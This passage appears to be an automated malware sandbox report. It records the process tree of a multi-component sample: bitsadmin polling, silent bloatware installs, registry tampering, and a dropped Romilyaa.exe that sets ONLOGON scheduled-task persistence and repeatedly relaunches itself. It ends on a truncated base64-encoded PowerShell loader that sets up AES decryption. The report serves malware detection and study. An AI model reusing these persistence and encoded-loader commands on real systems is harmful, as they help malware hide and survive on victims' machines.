        "C:\Windows\System32\cmd.exe" /c bitsadmin /info dwnl-task-25373 | findstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools" | findstr /R /V "^$" > "C:\Users\Admin\AppData\Local\Temp\dwnl_25373\log_bits_info.txt"
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:1732
      - C:\Windows\SysWOW64\bitsadmin.exe
        
        bitsadmin /info dwnl-task-25373
        6⤵
        
        PID:2260
      - C:\Windows\SysWOW64\findstr.exe
        
        findstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools"
        6⤵
        
        PID:3912
      - C:\Windows\SysWOW64\findstr.exe
        
        findstr /R /V "^$"
        6⤵
        
        PID:1960
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c bitsadmin /info dwnl-task-25373 | findstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools" | findstr /R /V "^$" > "C:\Users\Admin\AppData\Local\Temp\dwnl_25373\log_bits_info.txt"
        5⤵
        
        PID:3140
      - C:\Windows\SysWOW64\bitsadmin.exe
        
        bitsadmin /info dwnl-task-25373
        6⤵
        
        PID:2712
      - C:\Windows\SysWOW64\findstr.exe
        
        findstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools"
        6⤵
        
        PID:2024
      - C:\Windows\SysWOW64\findstr.exe
        
        findstr /R /V "^$"
        6⤵
        
        PID:3224
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c bitsadmin /info dwnl-task-25373 | findstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools" | findstr /R /V "^$" > "C:\Users\Admin\AppData\Local\Temp\dwnl_25373\log_bits_info.txt"
        5⤵
        
        PID:2860
      - C:\Windows\SysWOW64\bitsadmin.exe
        
        bitsadmin /info dwnl-task-25373
        6⤵
        
        PID:2344
      - C:\Windows\SysWOW64\findstr.exe
        
        findstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools"
        6⤵
        
        PID:3432
      - C:\Windows\SysWOW64\findstr.exe
        
        findstr /R /V "^$"
        6⤵
        
        PID:3164
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c bitsadmin /info dwnl-task-25373 | findstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools" | findstr /R /V "^$" > "C:\Users\Admin\AppData\Local\Temp\dwnl_25373\log_bits_info.txt"
        5⤵
        
        PID:3320
      - C:\Windows\SysWOW64\bitsadmin.exe
        
        bitsadmin /info dwnl-task-25373
        6⤵
        
        PID:1736
      - C:\Windows\SysWOW64\findstr.exe
        
        findstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools"
        6⤵
        
        PID:3468
      - C:\Windows\SysWOW64\findstr.exe
        
        findstr /R /V "^$"
        6⤵
        
        PID:4000
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c bitsadmin /info dwnl-task-25373 | findstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools" | findstr /R /V "^$" > "C:\Users\Admin\AppData\Local\Temp\dwnl_25373\log_bits_info.txt"
        5⤵
        
        PID:2404
      - C:\Windows\SysWOW64\bitsadmin.exe
        
        bitsadmin /info dwnl-task-25373
        6⤵
        
        PID:1528
      - C:\Windows\SysWOW64\findstr.exe
        
        findstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools"
        6⤵
        
        PID:3308
      - C:\Windows\SysWOW64\findstr.exe
        
        findstr /R /V "^$"
        6⤵
        
        PID:3096
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c bitsadmin /info dwnl-task-25373 | findstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools" | findstr /R /V "^$" > "C:\Users\Admin\AppData\Local\Temp\dwnl_25373\log_bits_info.txt"
        5⤵
        
        PID:3912
      - C:\Windows\SysWOW64\bitsadmin.exe
        
        bitsadmin /info dwnl-task-25373
        6⤵
        
        PID:3508
      - C:\Windows\SysWOW64\findstr.exe
        
        findstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools"
        6⤵
        
        PID:4084
      - C:\Windows\SysWOW64\findstr.exe
        
        findstr /R /V "^$"
        6⤵
        
        PID:2688
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c bitsadmin /info dwnl-task-25373 | findstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools" | findstr /R /V "^$" > "C:\Users\Admin\AppData\Local\Temp\dwnl_25373\log_bits_info.txt"
        5⤵
        
        PID:3028
      - C:\Windows\SysWOW64\bitsadmin.exe
        
        bitsadmin /info dwnl-task-25373
        6⤵
        
        PID:3300
      - C:\Windows\SysWOW64\findstr.exe
        
        findstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools"
        6⤵
        
        PID:1864
      - C:\Windows\SysWOW64\findstr.exe
        
        findstr /R /V "^$"
        6⤵
        
        PID:2116
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c bitsadmin /info dwnl-task-25373 | findstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools" | findstr /R /V "^$" > "C:\Users\Admin\AppData\Local\Temp\dwnl_25373\log_bits_info.txt"
        5⤵
        
        PID:1752
      - C:\Windows\SysWOW64\bitsadmin.exe
        
        bitsadmin /info dwnl-task-25373
        6⤵
        
        PID:2852
      - C:\Windows\SysWOW64\findstr.exe
        
        findstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools"
        6⤵
        
        PID:3192
      - C:\Windows\SysWOW64\findstr.exe
        
        findstr /R /V "^$"
        6⤵
        
        PID:1748
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c bitsadmin /info dwnl-task-25373 | findstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools" | findstr /R /V "^$" > "C:\Users\Admin\AppData\Local\Temp\dwnl_25373\log_bits_info.txt"
        5⤵
        
        PID:1960
      - C:\Windows\SysWOW64\bitsadmin.exe
        
        bitsadmin /info dwnl-task-25373
        6⤵
        
        PID:2712
      - C:\Windows\SysWOW64\findstr.exe
        
        findstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools"
        6⤵
        
        PID:3224
      - C:\Windows\SysWOW64\findstr.exe
        
        findstr /R /V "^$"
        6⤵
        
        PID:2828
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c bitsadmin /info dwnl-task-25373 | findstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools" | findstr /R /V "^$" > "C:\Users\Admin\AppData\Local\Temp\dwnl_25373\log_bits_info.txt"
        5⤵
        
        PID:2760
      - C:\Windows\SysWOW64\bitsadmin.exe
        
        bitsadmin /info dwnl-task-25373
        6⤵
        
        PID:2860
      - C:\Windows\SysWOW64\findstr.exe
        
        findstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools"
        6⤵
        
        PID:916
      - C:\Windows\SysWOW64\findstr.exe
        
        findstr /R /V "^$"
        6⤵
        
        PID:3988
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c bitsadmin /info dwnl-task-25373 | findstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools" | findstr /R /V "^$" > "C:\Users\Admin\AppData\Local\Temp\dwnl_25373\log_bits_info.txt"
        5⤵
        
        PID:1528
      - C:\Windows\SysWOW64\bitsadmin.exe
        
        bitsadmin /info dwnl-task-25373
        6⤵
        
        PID:3816
      - C:\Windows\SysWOW64\findstr.exe
        
        findstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools"
        6⤵
        
        PID:3096
      - C:\Windows\SysWOW64\findstr.exe
        
        findstr /R /V "^$"
        6⤵
        
        PID:3416
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c bitsadmin /info dwnl-task-25373 | findstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools" | findstr /R /V "^$" > "C:\Users\Admin\AppData\Local\Temp\dwnl_25373\log_bits_info.txt"
        5⤵
        
        PID:1456
      - C:\Windows\SysWOW64\bitsadmin.exe
        
        bitsadmin /info dwnl-task-25373
        6⤵
        
        PID:2956
      - C:\Windows\SysWOW64\findstr.exe
        
        findstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools"
        6⤵
        
        PID:2024
      - C:\Windows\SysWOW64\findstr.exe
        
        findstr /R /V "^$"
        6⤵
        
        PID:2712
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c bitsadmin /info dwnl-task-25373 | findstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools" | findstr /R /V "^$" > "C:\Users\Admin\AppData\Local\Temp\dwnl_25373\log_bits_info.txt"
        5⤵
        
        PID:2344
      - C:\Windows\SysWOW64\bitsadmin.exe
        
        bitsadmin /info dwnl-task-25373
        6⤵
        
        PID:236
      - C:\Windows\SysWOW64\findstr.exe
        
        findstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools"
        6⤵
        
        PID:2464
      - C:\Windows\SysWOW64\findstr.exe
        
        findstr /R /V "^$"
        6⤵
        
        PID:916
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /K SilentSetup.cmd
      4⤵
      Loads dropped DLL
      PID:2476
    - - C:\Users\Admin\AppData\Local\Temp\vir_a53c6808-bb5d-4305-a9a4-2685d5b3169c\bloatware\4\WinaeroTweaker-1.40.0.0-setup.exe
        
        WinaeroTweaker-1.40.0.0-setup.exe /SP- /VERYSILENT
        5⤵
        Executes dropped EXE
        Loads dropped DLL
        
        PID:3156
      - C:\Users\Admin\AppData\Local\Temp\is-JHMBK.tmp\WinaeroTweaker-1.40.0.0-setup.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-JHMBK.tmp\WinaeroTweaker-1.40.0.0-setup.tmp" /SL5="$2033E,2180794,169984,C:\Users\Admin\AppData\Local\Temp\vir_a53c6808-bb5d-4305-a9a4-2685d5b3169c\bloatware\4\WinaeroTweaker-1.40.0.0-setup.exe" /SP- /VERYSILENT
        6⤵
        Executes dropped EXE
        Loads dropped DLL
        Drops file in Program Files directory
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of FindShellTrayWindow
        
        PID:1932
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c taskkill /im winaerotweaker.exe /f
        7⤵
        
        PID:3496
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /im winaerotweaker.exe /f
        8⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:3108
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c taskkill /im winaerotweakerhelper.exe /f
        7⤵
        
        PID:2956
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /im winaerotweakerhelper.exe /f
        8⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:3140
- - C:\Users\Admin\AppData\Local\Temp\vir_a53c6808-bb5d-4305-a9a4-2685d5b3169c\regmess.exe
    regmess.exe
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    PID:1804
  - - C:\Windows\SysWOW64\cmd.exe
      cmd /c ""C:\Users\Admin\AppData\Local\Temp\regmess_e54063a5-de1a-4c41-9d3a-8f64125f2ffc\regmess.bat" "
      4⤵
      PID:3904
    - - C:\Windows\SysWOW64\reg.exe
        
        reg import Setup.reg /reg:32
        5⤵
        
        PID:1432
    - - C:\Windows\SysWOW64\reg.exe
        
        reg import Console.reg /reg:32
        5⤵
        
        PID:3308
    - - C:\Windows\SysWOW64\reg.exe
        
        reg import Desktop.reg /reg:32
        5⤵
        Sets desktop wallpaper using registry
        
        PID:3216
    - - C:\Windows\SysWOW64\reg.exe
        
        reg import International.reg /reg:32
        5⤵
        
        PID:2692
    - - C:\Windows\SysWOW64\reg.exe
        
        reg import Fonts.reg /reg:32
        5⤵
        Modifies Internet Explorer settings
        
        PID:2864
    - - C:\Windows\SysWOW64\reg.exe
        
        reg import Cursors.reg /reg:32
        5⤵
        
        PID:3724
- - C:\Windows\SysWOW64\timeout.exe
    timeout /t 10
    3⤵
    - Delays execution with timeout.exe
    PID:2892
- - C:\Users\Admin\AppData\Local\Temp\vir_a53c6808-bb5d-4305-a9a4-2685d5b3169c\scary.exe
    scary.exe
    3⤵
    - Executes dropped EXE
    - Suspicious use of AdjustPrivilegeToken
    PID:2832
  - - C:\Windows\system32\schtasks.exe
      "schtasks" /create /tn "Windows 10 Boot" /sc ONLOGON /tr "C:\Program Files\SubDir\Romilyaa.exe" /rl HIGHEST /f
      4⤵
      Scheduled Task/Job: Scheduled Task
      PID:3532
  - - C:\Program Files\SubDir\Romilyaa.exe
      "C:\Program Files\SubDir\Romilyaa.exe"
      4⤵
      Executes dropped EXE
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of FindShellTrayWindow
      Suspicious use of SendNotifyMessage
      Suspicious use of SetWindowsHookEx
      PID:1728
    - - C:\Windows\system32\schtasks.exe
        
        "schtasks" /create /tn "Windows 10 Boot" /sc ONLOGON /tr "C:\Program Files\SubDir\Romilyaa.exe" /rl HIGHEST /f
        5⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:2416
    - - C:\Windows\system32\cmd.exe
        
        cmd /c ""C:\Users\Admin\AppData\Local\Temp\uEvfqVTbJbZ4.bat" "
        5⤵
        
        PID:1624
      - C:\Windows\system32\chcp.com
        
        chcp 65001
        6⤵
        
        PID:3068
      - C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        6⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:2216
      - C:\Program Files\SubDir\Romilyaa.exe
        
        "C:\Program Files\SubDir\Romilyaa.exe"
        6⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of FindShellTrayWindow
        Suspicious use of SendNotifyMessage
        
        PID:3340
        
        C:\Windows\system32\schtasks.exe
        
        "schtasks" /create /tn "Windows 10 Boot" /sc ONLOGON /tr "C:\Program Files\SubDir\Romilyaa.exe" /rl HIGHEST /f
        7⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:3432
        
        C:\Windows\system32\cmd.exe
        
        cmd /c ""C:\Users\Admin\AppData\Local\Temp\owEt7kGZeMaV.bat" "
        7⤵
        
        PID:3208
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        8⤵
        
        PID:3192
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        8⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:3140
        
        C:\Program Files\SubDir\Romilyaa.exe
        
        "C:\Program Files\SubDir\Romilyaa.exe"
        8⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of FindShellTrayWindow
        Suspicious use of SendNotifyMessage
        
        PID:2700
        
        C:\Windows\system32\schtasks.exe
        
        "schtasks" /create /tn "Windows 10 Boot" /sc ONLOGON /tr "C:\Program Files\SubDir\Romilyaa.exe" /rl HIGHEST /f
        9⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:2420
        
        C:\Windows\system32\cmd.exe
        
        cmd /c ""C:\Users\Admin\AppData\Local\Temp\PHe8f3ZYA88q.bat" "
        9⤵
        
        PID:3428
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        10⤵
        
        PID:4004
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        10⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:3212
        
        C:\Program Files\SubDir\Romilyaa.exe
        
        "C:\Program Files\SubDir\Romilyaa.exe"
        10⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of FindShellTrayWindow
        Suspicious use of SendNotifyMessage
        
        PID:2236
        
        C:\Windows\system32\schtasks.exe
        
        "schtasks" /create /tn "Windows 10 Boot" /sc ONLOGON /tr "C:\Program Files\SubDir\Romilyaa.exe" /rl HIGHEST /f
        11⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:3528
        
        C:\Windows\system32\cmd.exe
        
        cmd /c ""C:\Users\Admin\AppData\Local\Temp\PXWru7PZBANE.bat" "
        11⤵
        
        PID:3200
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        12⤵
        
        PID:3380
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        12⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:2024
        
        C:\Program Files\SubDir\Romilyaa.exe
        
        "C:\Program Files\SubDir\Romilyaa.exe"
        12⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of FindShellTrayWindow
        Suspicious use of SendNotifyMessage
        
        PID:280
        
        C:\Windows\system32\schtasks.exe
        
        "schtasks" /create /tn "Windows 10 Boot" /sc ONLOGON /tr "C:\Program Files\SubDir\Romilyaa.exe" /rl HIGHEST /f
        13⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:2972
        
        C:\Windows\system32\cmd.exe
        
        cmd /c ""C:\Users\Admin\AppData\Local\Temp\CFCZXKKUk7CZ.bat" "
        13⤵
        
        PID:936
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        14⤵
        
        PID:2944
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        14⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:3212
        
        C:\Program Files\SubDir\Romilyaa.exe
        
        "C:\Program Files\SubDir\Romilyaa.exe"
        14⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of FindShellTrayWindow
        Suspicious use of SendNotifyMessage
        
        PID:3380
        
        C:\Windows\system32\schtasks.exe
        
        "schtasks" /create /tn "Windows 10 Boot" /sc ONLOGON /tr "C:\Program Files\SubDir\Romilyaa.exe" /rl HIGHEST /f
        15⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:3928
        
        C:\Windows\system32\cmd.exe
        
        cmd /c ""C:\Users\Admin\AppData\Local\Temp\UhqlbdqlKRRw.bat" "
        15⤵
        
        PID:3176
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        16⤵
        
        PID:2924
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        16⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:3504
        
        C:\Program Files\SubDir\Romilyaa.exe
        
        "C:\Program Files\SubDir\Romilyaa.exe"
        16⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of FindShellTrayWindow
        Suspicious use of SendNotifyMessage
        Suspicious use of SetWindowsHookEx
        
        PID:2564
        
        C:\Windows\system32\schtasks.exe
        
        "schtasks" /create /tn "Windows 10 Boot" /sc ONLOGON /tr "C:\Program Files\SubDir\Romilyaa.exe" /rl HIGHEST /f
        17⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:2732
        
        C:\Windows\system32\cmd.exe
        
        cmd /c ""C:\Users\Admin\AppData\Local\Temp\AMIEJiXUXV4J.bat" "
        17⤵
        
        PID:3040
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        18⤵
        
        PID:2604
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        18⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:2648
        
        C:\Program Files\SubDir\Romilyaa.exe
        
        "C:\Program Files\SubDir\Romilyaa.exe"
        18⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of FindShellTrayWindow
        Suspicious use of SendNotifyMessage
        
        PID:3168
        
        C:\Windows\system32\schtasks.exe
        
        "schtasks" /create /tn "Windows 10 Boot" /sc ONLOGON /tr "C:\Program Files\SubDir\Romilyaa.exe" /rl HIGHEST /f
        19⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:3504
        
        C:\Windows\system32\cmd.exe
        
        cmd /c ""C:\Users\Admin\AppData\Local\Temp\W8RzWmrH7pqZ.bat" "
        19⤵
        
        PID:3432
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        20⤵
        
        PID:3840
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        20⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:2148
        
        C:\Program Files\SubDir\Romilyaa.exe
        
        "C:\Program Files\SubDir\Romilyaa.exe"
        20⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of FindShellTrayWindow
        Suspicious use of SendNotifyMessage
        
        PID:3044
        
        C:\Windows\system32\schtasks.exe
        
        "schtasks" /create /tn "Windows 10 Boot" /sc ONLOGON /tr "C:\Program Files\SubDir\Romilyaa.exe" /rl HIGHEST /f
        21⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:3508
        
        C:\Windows\system32\cmd.exe
        
        cmd /c ""C:\Users\Admin\AppData\Local\Temp\turgvLt7ituE.bat" "
        21⤵
        
        PID:3180
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        22⤵
        
        PID:3028
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        22⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:2176
        
        C:\Program Files\SubDir\Romilyaa.exe
        
        "C:\Program Files\SubDir\Romilyaa.exe"
        22⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of FindShellTrayWindow
        Suspicious use of SendNotifyMessage
        
        PID:3176
        
        C:\Windows\system32\schtasks.exe
        
        "schtasks" /create /tn "Windows 10 Boot" /sc ONLOGON /tr "C:\Program Files\SubDir\Romilyaa.exe" /rl HIGHEST /f
        23⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:992
        
        C:\Windows\system32\cmd.exe
        
        cmd /c ""C:\Users\Admin\AppData\Local\Temp\2rlUtQQELTBO.bat" "
        23⤵
        
        PID:2712
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        24⤵
        
        PID:2216
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        24⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:1104
        
        C:\Program Files\SubDir\Romilyaa.exe
        
        "C:\Program Files\SubDir\Romilyaa.exe"
        24⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of FindShellTrayWindow
        Suspicious use of SendNotifyMessage
        
        PID:2944
        
        C:\Windows\system32\schtasks.exe
        
        "schtasks" /create /tn "Windows 10 Boot" /sc ONLOGON /tr "C:\Program Files\SubDir\Romilyaa.exe" /rl HIGHEST /f
        25⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:3804
        
        C:\Windows\system32\cmd.exe
        
        cmd /c ""C:\Users\Admin\AppData\Local\Temp\IvElWqs71Pfh.bat" "
        25⤵
        
        PID:3188
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        26⤵
        
        PID:2972
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        26⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:3912
        
        C:\Program Files\SubDir\Romilyaa.exe
        
        "C:\Program Files\SubDir\Romilyaa.exe"
        26⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of FindShellTrayWindow
        Suspicious use of SendNotifyMessage
        
        PID:3464
        
        C:\Windows\system32\schtasks.exe
        
        "schtasks" /create /tn "Windows 10 Boot" /sc ONLOGON /tr "C:\Program Files\SubDir\Romilyaa.exe" /rl HIGHEST /f
        27⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:3468
        
        C:\Windows\system32\cmd.exe
        
        cmd /c ""C:\Users\Admin\AppData\Local\Temp\vdphzoKhNurA.bat" "
        27⤵
        
        PID:2600
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        28⤵
        
        PID:3508
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        28⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:408
- - C:\Users\Admin\AppData\Local\Temp\vir_a53c6808-bb5d-4305-a9a4-2685d5b3169c\the.exe
    the.exe
    3⤵
    - Executes dropped EXE
    PID:2740
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe -EncodedCommand WwBTAHkAcwB0AGUAbQAuAFQAaAByAGUAYQBkAGkAbgBnAC4AVABoAHIAZQBhAGQAXQA6ADoAUwBsAGUAZQBwACgAMQAwADAAMAAwACkACgAKACQARQYkBkIGKgYgAD0AIABbAFMAeQBzAHQAZQBtAC4ASQBPAC4AUABhAHQAaABdADoAOgBHAGUAdABUAGUAbQBwAFAAYQB0AGgAKAApAAoAJABGBkUGSAYwBiwGIAA9ACAAJwBmAGkAbABlAC0AKgAuAHAAdQB0AGkAawAnAAoAJABFBkQGQQZfACMGLgZKBjEGIAA9ACAARwBlAHQALQBDAGgAaQBsAGQASQB0AGUAbQAgAC0AUABhAHQAaAAgACQARQYkBkIGKgYgAC0ARgBpAGwAdABlAHIAIAAkAEYGRQZIBjAGLAYgAHwAIABTAG8AcgB0AC0ATwBiAGoAZQBjAHQAIABMAGEAcwB0AFcAcgBpAHQAZQBUAGkAbQBlACAALQBEAGUAcwBjAGUAbgBkAGkAbgBnACAAfAAgAFMAZQBsAGUAYwB0AC0ATwBiAGoAZQBjAHQAIAAtAEYAaQByAHMAdAAgADEACgAKAGYAdQBuAGMAdABpAG8AbgAgAEEGQwZfACcGRAYqBjQGQQZKBjEGIAB7AAoAIAAgACAAIABwAGEAcgBhAG0AIAAoAAoAIAAgACAAIAAgACAAIAAgAFsAYgB5AHQAZQBbAF0AXQAkAEUGQQYqBicGLQYsAAoAIAAgACAAIAAgACAAIAAgAFsAYgB5AHQAZQBbAF0AXQAkAEUGKgYsBkcGXwAnBkQGKgZHBkoGJgYpBiwACgAgACAAIAAgACAAIAAgACAAWwBiAHkAdABlAFsAXQBdACQAKAZKBicGRgYnBioGCgAgACAAIAAgACkACgAKACAAIAAgACAAJABFBjQGQQYxBiAAPQAgAFsAUwB5AHMAdABlAG0ALgBTAGUAYwB1AHIAaQB0AHkALgBDAHIAeQBwAHQAbwBnAHIAYQBwAGgAeQAuAEEAZQBzAF0AOgA6AEMAcgBlAGEAdABlACgAKQAKACAAIAAgACAAJABFBjQGQQYxBi4ATQBvAGQAZQAgAD0AIABbAFMAeQBzAHQAZQBtAC4AUwBlAGMAdQByAGkAdAB5AC4AQwByAHkAcAB0AG8AZwByAGEAcABoAHkALgBDAGkAcABoAGUAcgBNAG8AZABlAF0AOgA6AEMAQgBDAAoAIAAgACAAIAAkAEUGNAZBBjEGLgBQAGEAZABkAGkAbgBnACAAPQAgAFsAUwB5AHMAdABlAG0ALgBTAGUAYwB1AHIAaQB0AHkALgBDAHIAeQBwAHQAbwBnAHIAYQBwAGgAeQAuAFAAYQBkAGQAaQBuAGcATQBvAGQAZQBdADoAOgBQAEsAQwBTADcACgAKACAAIAAgACAAJABBBkMGXwAnBkQGKgY0BkEGSgYxBl8ALAZHBicGMgYgAD0AIAAkAEUGNAZBBjEGLgBDAHIAZQBhAHQAZQBEAGUAYwByAHkAcAB0AG8AcgAoACQARQZBBioGJwYtBiwAIAAkAEUGKgYsBkcGXwAnBkQGKgZHBkoGJgYpBikACgAgACAAIAAgACQAKAZKBicGRgYnBioGXwBFBkEGQwZIBkMGKQZfACcGRAYqBjQGQQZKBjEGIAA9ACAAJABBBkMGXwAnBkQGKgY0BkEGSgYxBl8ALAZHBicGMgYuAFQAcgBhAG4AcwBmAG8AcgBtAEYAaQBuAGEAbABCAGwAbwBjAGsAKAAkACgGSgYnBkYGJwYqBiwAIAAwACwAIAAkACgGSgYnBk